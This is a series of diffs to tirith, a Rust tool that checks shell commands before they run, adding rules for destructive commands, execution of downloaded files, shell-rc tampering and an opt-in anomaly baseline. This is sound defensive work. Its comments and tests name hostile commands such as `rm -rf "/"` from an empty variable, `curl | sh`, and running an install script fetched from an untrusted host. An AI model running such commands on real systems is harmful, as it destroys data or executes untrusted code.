+    fn normalize_key_keeps_absolute_untouched() {
+        let key = normalize_key(Path::new("/tmp/x/./y"), Some(Path::new("/work")));
+        assert_eq!(key, PathBuf::from("/tmp/x/y"));
+    }
+
+    #[test]
+    fn mark_then_is_tainted_roundtrips() {
+        let dir = tempdir().unwrap();
+        let store = store_in(dir.path());
+        let cwd = Path::new("/work/repo");
+
+        assert!(is_tainted_at(&store, Path::new("./install.sh"), Some(cwd)).is_none());
+
+        let entry = mark_tainted_at(
+            &store,
+            Path::new("./install.sh"),
+            Some(cwd),
+            "fetch --save",
+            Some("https://untrusted.example/install.sh".to_string()),
+            None,
+        )
+        .unwrap();
+        assert_eq!(entry.path, "/work/repo/install.sh");
+        assert_eq!(entry.origin, "fetch --save");
+
+        let found = is_tainted_at(&store, Path::new("./install.sh"), Some(cwd))
+            .expect("path should be tainted after mark");
+        assert_eq!(found.path, "/work/repo/install.sh");
+        assert_eq!(
+            found.source_url.as_deref(),
+            Some("https://untrusted.example/install.sh")
+        );
+        // Same file reached via an absolute path must hit the same key.
+        let found_abs =
+            is_tainted_at(&store, Path::new("/work/repo/install.sh"), None).expect("abs lookup");
+        assert_eq!(found_abs.path, found.path);
+    }
+
+    #[test]
+    fn untainted_path_returns_none() {
+        let dir = tempdir().unwrap();
+        let store = store_in(dir.path());
+        let cwd = Path::new("/work/repo");
+        mark_tainted_at(
+            &store,
+            Path::new("./a.sh"),
+            Some(cwd),
+            "fetch --save",
+            None,
+            None,
+        )
+        .unwrap();
+        assert!(is_tainted_at(&store, Path::new("./b.sh"), Some(cwd)).is_none());
+    }
+
+    #[test]
+    fn clear_removes_only_the_target() {
+        let dir = tempdir().unwrap();
+        let store = store_in(dir.path());
+        let cwd = Path::new("/work/repo");
+        mark_tainted_at(&store, Path::new("./a.sh"), Some(cwd), "x", None, None).unwrap();
+        mark_tainted_at(&store, Path::new("./b.sh"), Some(cwd), "x", None, None).unwrap();
+
+        let removed = clear_taint_at(&store, Path::new("./a.sh"), Some(cwd)).unwrap();
+        assert_eq!(removed, 1);
+
+        assert!(is_tainted_at(&store, Path::new("./a.sh"), Some(cwd)).is_none());
+        assert!(is_tainted_at(&store, Path::new("./b.sh"), Some(cwd)).is_some());
+    }
+
+    #[test]
+    fn clear_nonexistent_path_is_zero() {
+        let dir = tempdir().unwrap();
+        let store = store_in(dir.path());
+        let removed = clear_taint_at(&store, Path::new("/nope.sh"), None).unwrap();
+        assert_eq!(removed, 0);
+    }
+
+    #[test]
+    fn list_dedups_by_path_last_wins() {
+        let dir = tempdir().unwrap();
+        let store = store_in(dir.path());
+        let cwd = Path::new("/work/repo");
+        mark_tainted_at(&store, Path::new("./a.sh"), Some(cwd), "first", None, None).unwrap();
+        mark_tainted_at(&store, Path::new("./b.sh"), Some(cwd), "x", None, None).unwrap();
+        mark_tainted_at(&store, Path::new("./a.sh"), Some(cwd), "second", None, None).unwrap();
+
+        let list = list_taints_at(&store);
+        assert_eq!(list.len(), 2, "two distinct paths");
+        let a = list.iter().find(|e| e.path.ends_with("a.sh")).unwrap();
+        assert_eq!(a.origin, "second", "last entry per path wins");
+    }
+
+    #[test]
+    fn store_nonempty_reflects_marks() {
+        let dir = tempdir().unwrap();
+        let store = store_in(dir.path());
+        assert!(!store_nonempty_at(&store));
+        mark_tainted_at(&store, Path::new("./a.sh"), None, "x", None, None).unwrap();
+        assert!(store_nonempty_at(&store));
+    }
+
+    #[test]
+    fn corrupt_line_is_skipped_not_fatal() {
+        let dir = tempdir().unwrap();
+        let store = store_in(dir.path());
+        std::fs::write(
+            &store,
+            "not json\n{\"path\":\"/work/repo/a.sh\",\"origin\":\"x\",\"marked_at\":\"t\"}\n\n",
+        )
+        .unwrap();
+        let list = list_taints_at(&store);
+        assert_eq!(list.len(), 1);
+        assert_eq!(list[0].path, "/work/repo/a.sh");
+    }
+}

--- a/crates/tirith-core/src/taint.rs
+++ b/crates/tirith-core/src/taint.rs
@@ -104,11 +104,18 @@ pub fn normalize_key(path: &Path, cwd: Option<&Path>) -> PathBuf {
             Component::ParentDir => {
                 out.pop();
             }
-            Component::RootDir => {
-                out = PathBuf::from(comp.as_os_str());
-            }
             Component::Prefix(p) => {
+                // Drive/UNC prefix on Windows is always the first component of
+                // an absolute path; seed `out` with it. (No-op on Unix.)
                 out = PathBuf::from(p.as_os_str());
+            }
+            Component::RootDir => {
+                // Append the root anchor to whatever prefix `out` already holds,
+                // rather than replacing it: on Windows `C:` + `\` must stay
+                // `C:\` (replacing it would drop the drive and collide across
+                // drives); on Unix this turns an empty `out` into `/`. This is
+                // cargo's canonical `normalize_path` ordering.
+                out.push(comp.as_os_str());
             }
             Component::Normal(seg) => out.push(seg),
         }

--- a/crates/tirith-core/src/verdict.rs
+++ b/crates/tirith-core/src/verdict.rs
@@ -748,9 +748,14 @@ pub enum RuleId {
     BlastSymlinkTraversal,
     /// M10 ch1 (HOT) — a destructive command targets a `"$VAR/"`-shaped path
     /// where `VAR` resolves to empty (`rm -rf "$EMPTY/"` with `EMPTY` unset →
-    /// `rm -rf "/"`). High severity. Detected against an injected env-map (the
-    /// hot path snapshots `std::env` once and passes it in), so the detector is
-    /// pure and the empty-var case is unit-testable without an env mutation.
+    /// `rm -rf "/"`). **Severity depends on what tirith can see (F2):** High when
+    /// `VAR` is PRESENT-and-empty in tirith's env-map (an unambiguous collapse);
+    /// Info when `VAR` is merely ABSENT, because it could be a benign
+    /// non-exported shell-local that IS set — tirith cannot observe shell-locals,
+    /// so it must not BLOCK the ambiguous case. Detected against an injected
+    /// env-map (the hot path snapshots `std::env` once and passes it in), so the
+    /// detector is pure and the present-empty case is unit-testable without an
+    /// env mutation. A leading `sudo`/`doas` is unwrapped before matching (C1).
     BlastEmptyVarGlob,
     /// M10 ch1 (HOT) — `find … -delete` recursively unlinks every matching
     /// entry. Medium severity. Surfaced by string shape on the hot path; run

--- a/crates/tirith-core/src/verdict.rs
+++ b/crates/tirith-core/src/verdict.rs
@@ -775,6 +775,33 @@ pub enum RuleId {
     /// `EXTERNALLY_TRIGGERED_RULES`, covered by a unit test in
     /// `crates/tirith/src/cli/checkpoint.rs`.
     PostRunShellRcModified,
+
+    // Tainted-content tracking rules (M10 ch3). These fire from
+    // `engine::analyze` (Exec context) when the parsed command's leader (or, for
+    // `source`/`.`, the sourced file argument) is a path recorded as tainted in
+    // the JSONL store at `state_dir()/taint.jsonl` (`crate::taint`). A file
+    // becomes tainted via `tirith fetch --save <path> <url>` (a downloaded file
+    // kept at a known path). The lookup is a per-leader path-key match against a
+    // per-process-cached store; when the store is empty/absent the engine never
+    // forces past its tier-1 fast-exit for the check, so a machine that has
+    // never marked a file pays nothing. They carry no PATTERN_TABLE entry (the
+    // trigger is runtime state + a path the user typed, not a regex on the
+    // input) and live in `EXTERNALLY_TRIGGERED_RULES`, covered by unit tests in
+    // `crates/tirith-core/src/taint.rs` against a `tempfile::tempdir()` store.
+    /// M10 ch3 — the parsed command leader is a path recorded as tainted
+    /// (downloaded from a risky source via `tirith fetch --save`). High
+    /// severity: executing a freshly-downloaded-from-untrusted-source file is
+    /// the exact flow this tracking exists to surface (`bash ./install.sh`
+    /// after `tirith fetch --save ./install.sh https://untrusted.example/…`).
+    /// The mark persists until an explicit `tirith taint clear` — it is NOT
+    /// auto-cleared by `chmod +x` or a `bash -n` parse check.
+    ExecOfTaintedFile,
+    /// M10 ch3 — a `source ./tainted.sh` / `. ./tainted.sh` sources a file
+    /// recorded as tainted. Medium severity (best-effort): sourcing runs the
+    /// file's commands in the current shell, but the `source`/`.` builtin shape
+    /// is only matched when it is the command leader, so this is a narrower,
+    /// lower-confidence signal than `ExecOfTaintedFile`.
+    CommandSourcedFromTaintedFile,
 }
 
 impl fmt::Display for RuleId {

--- a/crates/tirith-core/src/verdict.rs
+++ b/crates/tirith-core/src/verdict.rs
@@ -709,6 +709,61 @@ pub enum RuleId {
     /// reaching out to the network during a hook is worth surfacing even when it
     /// is not a raw `curl | sh`.
     RepoHookExternalFetch,
+
+    // Blast-radius rules (M10 ch1). Split into a CHEAP hot-path subset and a
+    // SIMULATOR-ONLY subset.
+    //
+    // HOT PATH (4 rules) — fire from `engine::analyze` (Exec context) via the
+    // CHEAP, filesystem-free `blast_radius::cheap_check` when the parsed leader
+    // is `rm|mv|chmod|find … -delete|rsync --delete` and a target is dangerous
+    // by STRING SHAPE alone. They are pure string compares + an injected env-map
+    // lookup (no `stat`, no walk, no glob expansion). Tier-1 gate is the
+    // `destructive_fs_op` PATTERN_TABLE entry. These four have `command.toml`
+    // fixtures: `BlastWritesSystemPath`, `BlastEmptyVarGlob`, `BlastFindDelete`,
+    // `BlastRsyncDelete`.
+    //
+    // SIMULATOR-ONLY (3 rules) — fire ONLY from explicit
+    // `tirith preview -- "<cmd>"` via `blast_radius::simulate` +
+    // `report_findings`, which WALK THE FILESYSTEM (depth ≤ 5, ≤ 100k files),
+    // expand globs against cwd, and count files/dirs/symlinks. They are NEVER
+    // reachable from the `tirith check` hot path, so they carry no static
+    // fixture and live in `EXTERNALLY_TRIGGERED_RULES`, covered by unit tests in
+    // `blast_radius.rs` against `tempfile::tempdir()` trees:
+    // `BlastDeletesOutsideRepo`, `BlastSymlinkTraversal`, `BlastLargeFileCount`.
+    /// M10 ch1 (SIMULATOR-ONLY) — a `tirith preview` simulation resolved at
+    /// least one destructive target outside the repository root (or above the
+    /// cwd when no repo root is known). High severity. Never fires on the hot
+    /// path — the filesystem walk that resolves the target tree runs only under
+    /// `tirith preview`.
+    BlastDeletesOutsideRepo,
+    /// M10 ch1 (HOT) — a destructive command (`rm`/`mv`/`chmod -R`/`find
+    /// -delete`/`rsync --delete`) targets a broad system path (`/`, `/home`,
+    /// `/usr`, `/etc`, `~`, …) by string shape alone. High severity. Cheap,
+    /// filesystem-free string compare on the hot path.
+    BlastWritesSystemPath,
+    /// M10 ch1 (SIMULATOR-ONLY) — a `tirith preview` simulation found symlinks
+    /// in the destructive target tree (counted, never followed). Medium
+    /// severity — a tool may traverse a link and reach files outside the visible
+    /// tree. Requires the filesystem walk, so it never fires on the hot path.
+    BlastSymlinkTraversal,
+    /// M10 ch1 (HOT) — a destructive command targets a `"$VAR/"`-shaped path
+    /// where `VAR` resolves to empty (`rm -rf "$EMPTY/"` with `EMPTY` unset →
+    /// `rm -rf "/"`). High severity. Detected against an injected env-map (the
+    /// hot path snapshots `std::env` once and passes it in), so the detector is
+    /// pure and the empty-var case is unit-testable without an env mutation.
+    BlastEmptyVarGlob,
+    /// M10 ch1 (HOT) — `find … -delete` recursively unlinks every matching
+    /// entry. Medium severity. Surfaced by string shape on the hot path; run
+    /// `tirith preview` for the file count.
+    BlastFindDelete,
+    /// M10 ch1 (HOT) — `rsync --delete` prunes destination files not present in
+    /// the source. Medium severity. A wrong source/dest pair wipes the
+    /// destination. Surfaced by string shape on the hot path.
+    BlastRsyncDelete,
+    /// M10 ch1 (SIMULATOR-ONLY) — a `tirith preview` simulation counted more
+    /// than 1000 files in the destructive target tree. Info severity (never
+    /// blocks). Requires the filesystem walk, so it never fires on the hot path.
+    BlastLargeFileCount,
 }
 
 impl fmt::Display for RuleId {

--- a/crates/tirith-core/src/verdict.rs
+++ b/crates/tirith-core/src/verdict.rs
@@ -802,6 +802,29 @@ pub enum RuleId {
     /// is only matched when it is the command leader, so this is a narrower,
     /// lower-confidence signal than `ExecOfTaintedFile`.
     CommandSourcedFromTaintedFile,
+
+    // Anomaly-detection rules (M10 ch5, design-decision D2). These fire from
+    // `engine::analyze` (any context) ONLY when `policy.baseline_enabled` is set
+    // (opt-in, default false) AND some other detection rule already fired: the
+    // engine looks up the firing finding's privacy-hashed tuple
+    // `(rule_id, host_hash, ecosystem, sudo_flag, cwd_repo_hash)` in the sliding
+    // window at `state_dir()/baseline.jsonl` (`crate::baseline`) and, if the
+    // pattern is new / rare for this user, appends one of these Info findings.
+    // The observation is recorded regardless. They carry no PATTERN_TABLE entry
+    // (the trigger is runtime baseline STATE plus another finding, not a regex /
+    // byte signal on the input) and live in `EXTERNALLY_TRIGGERED_RULES`,
+    // covered by unit tests in `crate::baseline` against a `tempfile::tempdir()`
+    // store. Privacy: the store records salted-sha256 hashes, NEVER raw
+    // hostnames or paths — see the `baseline` module doc.
+    /// M10 ch5 — the privacy-hashed tuple of a firing finding has never been
+    /// seen in this user's baseline window (`count == 0`). Info severity: it
+    /// annotates "this is new for you" and never changes the action. Only
+    /// emitted when `policy.baseline_enabled` is on.
+    AnomalyFirstTimeInThisRepo,
+    /// M10 ch5 — the tuple has been seen before but rarely (`0 < count < 3`) in
+    /// the baseline window. Info severity. Only emitted when
+    /// `policy.baseline_enabled` is on.
+    AnomalyRareInBaseline,
 }
 
 impl fmt::Display for RuleId {

--- a/crates/tirith-core/src/verdict.rs
+++ b/crates/tirith-core/src/verdict.rs
@@ -764,6 +764,17 @@ pub enum RuleId {
     /// than 1000 files in the destructive target tree. Info severity (never
     /// blocks). Requires the filesystem walk, so it never fires on the hot path.
     BlastLargeFileCount,
+
+    /// M10 ch2 (RUNTIME-STATE) — a `tirith watch -- <cmd>` run modified a shell
+    /// rc / profile file (`~/.bashrc`, `~/.zshrc`, `~/.profile`, fish /
+    /// PowerShell profiles) DURING the watched command. High severity: a command
+    /// you ran to "install a tool" quietly rewriting your login shell is the
+    /// classic persistence foothold. Fires only from the `tirith watch` post-run
+    /// diff (snapshot → run → snapshot), never from the `tirith check` hot path,
+    /// so it carries no PATTERN_TABLE entry and lives in
+    /// `EXTERNALLY_TRIGGERED_RULES`, covered by a unit test in
+    /// `crates/tirith/src/cli/checkpoint.rs`.
+    PostRunShellRcModified,
 }
 
 impl fmt::Display for RuleId {

--- a/crates/tirith-core/tests/golden_fixtures.rs
+++ b/crates/tirith-core/tests/golden_fixtures.rs
@@ -746,6 +746,9 @@ const ALL_RULE_IDS: &[&str] = &[
     "blast_large_file_count",
     // Post-run diff rule (M10 ch2)
     "post_run_shell_rc_modified",
+    // Tainted-content tracking rules (M10 ch3)
+    "exec_of_tainted_file",
+    "command_sourced_from_tainted_file",
 ];
 
 /// Collect all expected_rules from all fixture files into a set.
@@ -1024,6 +1027,17 @@ const EXTERNALLY_TRIGGERED_RULES: &[&str] = &[
     // (`watch_flags_shell_rc_modification`), following the M9-ch2 runtime-state
     // pattern.
     "post_run_shell_rc_modified",
+    // M10 ch3 — tainted-content tracking rules fire from `engine::analyze` (Exec)
+    // ONLY when the parsed leader (or an interpreter/`source` file argument) is a
+    // path recorded in the JSONL taint store at `state_dir()/taint.jsonl`. The
+    // static golden-fixture runner uses no taint store (and never writes to the
+    // real `state_dir()`), so a text fixture cannot drive either rule — the
+    // trigger is runtime state, not input content. Covered by unit tests in
+    // `crates/tirith-core/src/taint.rs` (store round-trip against a
+    // `tempfile::tempdir()`) plus `engine.rs` taint hot-path tests that point the
+    // lookup at a temp store, following the M8/M9 runtime-state pattern.
+    "exec_of_tainted_file",
+    "command_sourced_from_tainted_file",
 ];
 
 /// Collect expected_rules across the output-direction fixture files.
@@ -1393,6 +1407,9 @@ fn test_rule_id_list_is_complete() {
         RuleId::BlastLargeFileCount,
         // Post-run diff rule (M10 ch2)
         RuleId::PostRunShellRcModified,
+        // Tainted-content tracking rules (M10 ch3)
+        RuleId::ExecOfTaintedFile,
+        RuleId::CommandSourcedFromTaintedFile,
     ];
 
     let all_rule_set: HashSet<&str> = ALL_RULE_IDS.iter().copied().collect();

--- a/crates/tirith-core/tests/golden_fixtures.rs
+++ b/crates/tirith-core/tests/golden_fixtures.rs
@@ -736,6 +736,14 @@ const ALL_RULE_IDS: &[&str] = &[
     "repo_hook_sudo",
     "repo_hook_suspicious_shell_pattern",
     "repo_hook_external_fetch",
+    // Blast-radius rules (M10 ch1)
+    "blast_deletes_outside_repo",
+    "blast_writes_system_path",
+    "blast_symlink_traversal",
+    "blast_empty_var_glob",
+    "blast_find_delete",
+    "blast_rsync_delete",
+    "blast_large_file_count",
 ];
 
 /// Collect all expected_rules from all fixture files into a set.
@@ -991,6 +999,21 @@ const EXTERNALLY_TRIGGERED_RULES: &[&str] = &[
     "repo_hook_sudo",
     "repo_hook_suspicious_shell_pattern",
     "repo_hook_external_fetch",
+    // M10 ch1 — blast-radius SIMULATOR-ONLY rules. These fire ONLY from
+    // `tirith preview -- "<cmd>"` via `blast_radius::simulate` +
+    // `report_findings`, which WALK THE FILESYSTEM (depth ≤ 5, ≤ 100k files),
+    // expand globs against cwd, and count files/dirs/symlinks. The
+    // `engine::analyze` golden-fixture runner never walks the filesystem (that
+    // is `preview`'s job, off the hot path), so a static text fixture cannot
+    // reproduce them — they need a real on-disk target tree. Covered by unit
+    // tests in `crates/tirith-core/src/blast_radius.rs` against
+    // `tempfile::tempdir()` trees. The FOUR CHEAP hot-path rules
+    // (`blast_writes_system_path`, `blast_empty_var_glob`, `blast_find_delete`,
+    // `blast_rsync_delete`) DO have static `command.toml` fixtures because they
+    // fire by string shape with no filesystem access.
+    "blast_deletes_outside_repo",
+    "blast_symlink_traversal",
+    "blast_large_file_count",
 ];
 
 /// Collect expected_rules across the output-direction fixture files.
@@ -1350,6 +1373,14 @@ fn test_rule_id_list_is_complete() {
         RuleId::RepoHookSudo,
         RuleId::RepoHookSuspiciousShellPattern,
         RuleId::RepoHookExternalFetch,
+        // Blast-radius rules (M10 ch1)
+        RuleId::BlastDeletesOutsideRepo,
+        RuleId::BlastWritesSystemPath,
+        RuleId::BlastSymlinkTraversal,
+        RuleId::BlastEmptyVarGlob,
+        RuleId::BlastFindDelete,
+        RuleId::BlastRsyncDelete,
+        RuleId::BlastLargeFileCount,
     ];
 
     let all_rule_set: HashSet<&str> = ALL_RULE_IDS.iter().copied().collect();

--- a/crates/tirith-core/tests/golden_fixtures.rs
+++ b/crates/tirith-core/tests/golden_fixtures.rs
@@ -744,6 +744,8 @@ const ALL_RULE_IDS: &[&str] = &[
     "blast_find_delete",
     "blast_rsync_delete",
     "blast_large_file_count",
+    // Post-run diff rule (M10 ch2)
+    "post_run_shell_rc_modified",
 ];
 
 /// Collect all expected_rules from all fixture files into a set.
@@ -1014,6 +1016,14 @@ const EXTERNALLY_TRIGGERED_RULES: &[&str] = &[
     "blast_deletes_outside_repo",
     "blast_symlink_traversal",
     "blast_large_file_count",
+    // M10 ch2 — the post-run shell-rc-modified rule fires ONLY from the
+    // `tirith watch -- "<cmd>"` post-run diff (snapshot → run → snapshot), never
+    // from the `engine::analyze` golden-fixture runner. It needs a real
+    // before/after on-disk rc-file state that a static text fixture cannot
+    // reproduce. Covered by a unit test in `crates/tirith/src/cli/checkpoint.rs`
+    // (`watch_flags_shell_rc_modification`), following the M9-ch2 runtime-state
+    // pattern.
+    "post_run_shell_rc_modified",
 ];
 
 /// Collect expected_rules across the output-direction fixture files.
@@ -1381,6 +1391,8 @@ fn test_rule_id_list_is_complete() {
         RuleId::BlastFindDelete,
         RuleId::BlastRsyncDelete,
         RuleId::BlastLargeFileCount,
+        // Post-run diff rule (M10 ch2)
+        RuleId::PostRunShellRcModified,
     ];
 
     let all_rule_set: HashSet<&str> = ALL_RULE_IDS.iter().copied().collect();

--- a/crates/tirith-core/tests/golden_fixtures.rs
+++ b/crates/tirith-core/tests/golden_fixtures.rs
@@ -749,6 +749,9 @@ const ALL_RULE_IDS: &[&str] = &[
     // Tainted-content tracking rules (M10 ch3)
     "exec_of_tainted_file",
     "command_sourced_from_tainted_file",
+    // Anomaly-detection rules (M10 ch5, D2)
+    "anomaly_first_time_in_this_repo",
+    "anomaly_rare_in_baseline",
 ];
 
 /// Collect all expected_rules from all fixture files into a set.
@@ -1038,6 +1041,17 @@ const EXTERNALLY_TRIGGERED_RULES: &[&str] = &[
     // lookup at a temp store, following the M8/M9 runtime-state pattern.
     "exec_of_tainted_file",
     "command_sourced_from_tainted_file",
+    // M10 ch5 — anomaly-detection rules fire from `engine::analyze` ONLY when
+    // `policy.baseline_enabled` is set (opt-in, default false) AND another
+    // detection rule already fired, via a lookup of the firing finding's
+    // privacy-hashed tuple in the runtime baseline store at
+    // `state_dir()/baseline.jsonl`. The static golden-fixture runner uses the
+    // default policy (baseline off) and no baseline store, so a text fixture
+    // cannot drive either rule — the trigger is runtime state, not input
+    // content. Covered by unit tests in `crates/tirith-core/src/baseline.rs`
+    // against a `tempfile::tempdir()` store.
+    "anomaly_first_time_in_this_repo",
+    "anomaly_rare_in_baseline",
 ];
 
 /// Collect expected_rules across the output-direction fixture files.
@@ -1410,6 +1424,9 @@ fn test_rule_id_list_is_complete() {
         // Tainted-content tracking rules (M10 ch3)
         RuleId::ExecOfTaintedFile,
         RuleId::CommandSourcedFromTaintedFile,
+        // Anomaly-detection rules (M10 ch5, D2)
+        RuleId::AnomalyFirstTimeInThisRepo,
+        RuleId::AnomalyRareInBaseline,
     ];
 
     let all_rule_set: HashSet<&str> = ALL_RULE_IDS.iter().copied().collect();

--- a/crates/tirith/src/cli/baseline.rs
+++ b/crates/tirith/src/cli/baseline.rs
@@ -1,0 +1,287 @@
+//! `tirith baseline learn|status|reset` (M10 ch5, design-decision **D2**).
+//!
+//! Thin presenter over [`tirith_core::baseline`]. The sliding window, salted
+//! hashing, and all store I/O live in the library; this module is output, the
+//! `policy.baseline_enabled` flag toggle, and the `reset` confirmation prompt.
+//!
+//! The anomaly baseline is **OPT-IN** (D2): a fresh install does nothing. The
+//! three subcommands:
+//!
+//! * `learn` — flip `policy.baseline_enabled` to `true` (append-or-rewrite a
+//!   single line in the local `policy.yaml`, mirroring `tirith env guard on`).
+//!   Once on, the engine records a privacy-hashed observation for every
+//!   detection-rule firing and surfaces an Info anomaly finding for first-time /
+//!   rare patterns.
+//! * `status` — the top 20 patterns by in-window count, plus the enabled flag
+//!   and an early-baseline-mode note while the window is sparse.
+//! * `reset` — zero the store (prompts unless `--yes`; in `--json` mode `--yes`
+//!   is required).
+//!
+//! Privacy: the store records only salted-sha256 hashes (host, cwd/repo) and
+//! low-cardinality categoricals (ecosystem, sudo). It never holds raw hostnames
+//! or paths — see the `tirith_core::baseline` module doc.
+
+use std::io::Write;
+use std::path::PathBuf;
+
+use tirith_core::baseline;
+use tirith_core::policy::{self as policy_mod, Policy};
+
+use super::{confirm, write_json_stdout};
+
+// ─── learn (enable) ──────────────────────────────────────────────────────────
+
+/// `tirith baseline learn` — turn the opt-in anomaly baseline ON by setting
+/// `policy.baseline_enabled = true` in the local policy file.
+pub fn learn(json: bool) -> i32 {
+    let target_path = match resolve_policy_path() {
+        Ok(p) => p,
+        Err(code) => return code,
+    };
+
+    if let Err(e) = update_baseline_flag(&target_path, true) {
+        eprintln!(
+            "tirith baseline learn: failed to update {}: {e}",
+            target_path.display()
+        );
+        return 1;
+    }
+
+    if json {
+        let out = serde_json::json!({
+            "schema_version": 1,
+            "baseline_enabled": true,
+            "policy_path": target_path.display().to_string(),
+        });
+        if !write_json_stdout(&out, "tirith baseline learn: failed to write JSON output") {
+            return 1;
+        }
+    } else {
+        eprintln!(
+            "tirith baseline: learning ON (written to {}).",
+            target_path.display()
+        );
+        eprintln!(
+            "  From now on tirith records a privacy-hashed observation for every finding and"
+        );
+        eprintln!("  surfaces an Info 'first time / rare for you' note for novel patterns. No raw");
+        eprintln!("  hostnames or paths are stored — only salted hashes. It never blocks.");
+        eprintln!(
+            "  Expect 'early-baseline mode' (everything looks new) until ~{} observations.",
+            baseline::EARLY_BASELINE_ENTRIES
+        );
+    }
+    0
+}
+
+// ─── status ──────────────────────────────────────────────────────────────────
+
+/// `tirith baseline status` — show the top 20 patterns, the enabled flag, and
+/// the early-baseline-mode note. Always exits 0 (informational).
+pub fn status(json: bool) -> i32 {
+    let policy = Policy::discover_partial(None);
+    let top = baseline::status(20);
+    let total = baseline::entry_count();
+    let early = total < baseline::EARLY_BASELINE_ENTRIES;
+
+    if json {
+        let out = serde_json::json!({
+            "schema_version": 1,
+            "baseline_enabled": policy.baseline_enabled,
+            "total_observations": total,
+            "early_baseline_mode": early,
+            "early_baseline_threshold": baseline::EARLY_BASELINE_ENTRIES,
+            "window_days": baseline::WINDOW_DAYS,
+            "top_patterns": top,
+        });
+        if !write_json_stdout(&out, "tirith baseline status: failed to write JSON output") {
+            return 1;
+        }
+        return 0;
+    }
+
+    eprintln!(
+        "tirith baseline: {}",
+        if policy.baseline_enabled {
+            "ON (learning)"
+        } else {
+            "OFF (opt-in — run `tirith baseline learn` to enable)"
+        }
+    );
+    eprintln!(
+        "  {total} observation(s) in the last {} days.",
+        baseline::WINDOW_DAYS
+    );
+    if early {
+        eprintln!(
+            "  early-baseline mode: fewer than {} observations — anomaly signals are not yet",
+            baseline::EARLY_BASELINE_ENTRIES
+        );
+        eprintln!(
+            "  meaningful (everything looks new). Keep using tirith to fill in the baseline."
+        );
+    }
+
+    if top.is_empty() {
+        eprintln!("  No patterns recorded yet.");
+        return 0;
+    }
+
+    eprintln!();
+    eprintln!("Top patterns (privacy-hashed; counts over the window):");
+    for p in &top {
+        let host = p.host_hash.as_deref().unwrap_or("-");
+        let eco = p.ecosystem.as_deref().unwrap_or("-");
+        let repo = p.cwd_repo_hash.as_deref().unwrap_or("-");
+        eprintln!(
+            "  {:>4}x  {:<32} host={host} eco={eco} sudo={} repo={repo}",
+            p.count, p.rule_id, p.sudo_flag,
+        );
+    }
+    0
+}
+
+// ─── reset ─────────────────────────────────────────────────────────────────--
+
+/// `tirith baseline reset` — zero the store. Prompts for confirmation unless
+/// `--yes`; in `--json` mode `--yes` is required (no prompt on a machine surface).
+pub fn reset(yes: bool, json: bool) -> i32 {
+    let total = baseline::entry_count();
+
+    if total == 0 {
+        if json {
+            let out = serde_json::json!({
+                "schema_version": 1,
+                "reset": false,
+                "removed": 0,
+            });
+            if !write_json_stdout(&out, "tirith baseline reset: failed to write JSON output") {
+                return 1;
+            }
+        } else {
+            eprintln!("tirith baseline reset: nothing to reset (baseline is empty).");
+        }
+        return 0;
+    }
+
+    if json && !yes {
+        eprintln!("tirith baseline reset: --yes required in JSON mode to confirm reset");
+        return 2;
+    }
+    if !json
+        && !confirm(
+            &format!("Zero the anomaly baseline ({total} observation(s))?"),
+            yes,
+        )
+    {
+        eprintln!("Aborted — baseline left in place.");
+        return 0;
+    }
+
+    match baseline::reset() {
+        Ok(removed) => {
+            if json {
+                let out = serde_json::json!({
+                    "schema_version": 1,
+                    "reset": removed > 0,
+                    "removed": removed,
+                });
+                if !write_json_stdout(&out, "tirith baseline reset: failed to write JSON output") {
+                    return 1;
+                }
+            } else {
+                eprintln!("tirith baseline: reset — {removed} observation(s) removed.");
+            }
+            0
+        }
+        Err(e) => {
+            eprintln!("tirith baseline reset: {e}");
+            2
+        }
+    }
+}
+
+// ─── helpers ───────────────────────────────────────────────────────────────--
+
+/// Resolve the policy file `learn` should write to: the active local policy if
+/// one is discoverable, else the user config-dir default. Mirrors
+/// `cli::env_guard::resolve_policy_path_for_guard`.
+fn resolve_policy_path() -> Result<PathBuf, i32> {
+    if let Some(existing) = policy_mod::discover_local_policy_path(None) {
+        return Ok(existing);
+    }
+    let user = policy_mod::config_dir().ok_or_else(|| {
+        eprintln!("tirith baseline: could not resolve user config dir");
+        1
+    })?;
+    Ok(user.join("policy.yaml"))
+}
+
+/// Idempotently set / update the `baseline_enabled` line in a policy YAML file.
+/// Append-or-rewrite — never touches other lines (mirrors
+/// `cli::env_guard::update_policy_guard_key`).
+fn update_baseline_flag(path: &std::path::Path, enable: bool) -> std::io::Result<()> {
+    if let Some(parent) = path.parent() {
+        std::fs::create_dir_all(parent)?;
+    }
+    let existing = std::fs::read_to_string(path).unwrap_or_default();
+    let new_line = format!("baseline_enabled: {enable}");
+
+    let mut out = String::new();
+    let mut replaced = false;
+    for line in existing.lines() {
+        if line.trim_start().starts_with("baseline_enabled:") {
+            out.push_str(&new_line);
+            out.push('\n');
+            replaced = true;
+        } else {
+            out.push_str(line);
+            out.push('\n');
+        }
+    }
+    if !replaced {
+        if !out.is_empty() && !out.ends_with('\n') {
+            out.push('\n');
+        }
+        out.push_str(&new_line);
+        out.push('\n');
+    }
+
+    let mut opts = std::fs::OpenOptions::new();
+    opts.write(true).create(true).truncate(true);
+    #[cfg(unix)]
+    {
+        use std::os::unix::fs::OpenOptionsExt;
+        opts.mode(0o600);
+    }
+    let mut f = opts.open(path)?;
+    f.write_all(out.as_bytes())
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn update_baseline_flag_appends_and_replaces() {
+        let dir = tempfile::tempdir().unwrap();
+        let path = dir.path().join("policy.yaml");
+        std::fs::write(&path, "paranoia: 2\nfail_mode: open\n").unwrap();
+
+        update_baseline_flag(&path, true).unwrap();
+        let content = std::fs::read_to_string(&path).unwrap();
+        assert!(content.contains("baseline_enabled: true"), "{content}");
+        assert!(content.contains("paranoia: 2"), "other lines preserved");
+
+        // Flip off — must REPLACE the existing line, not duplicate it.
+        update_baseline_flag(&path, false).unwrap();
+        let content = std::fs::read_to_string(&path).unwrap();
+        assert!(content.contains("baseline_enabled: false"), "{content}");
+        assert!(!content.contains("baseline_enabled: true"), "{content}");
+        assert_eq!(
+            content.matches("baseline_enabled:").count(),
+            1,
+            "must not duplicate the key"
+        );
+    }
+}

--- a/crates/tirith/src/cli/checkpoint.rs
+++ b/crates/tirith/src/cli/checkpoint.rs
@@ -252,6 +252,10 @@ pub fn watch(command: &[String], paths: &[String], with_net_hints: bool, json: b
         None
     };
 
+    // F1: keep tirith alive across a Ctrl-C so the AFTER snapshot + diff always
+    // run (the child is in its own process group, see `run_command`).
+    install_watch_sigint_handler();
+
     // --- RUN the command with the user's full privileges (no isolation) ---
     let run_status = run_command(&command_str);
     let exit_code = match run_status {
